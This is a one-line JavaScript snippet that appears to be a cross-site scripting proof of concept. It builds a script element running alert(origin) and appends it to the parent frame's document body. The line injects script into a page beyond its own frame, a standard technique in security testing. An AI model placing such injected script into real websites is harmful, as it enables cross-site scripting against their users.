xss = document.createElement("script"); xss.textContent = "alert(origin)"; parent.document.body.appendChild(xss);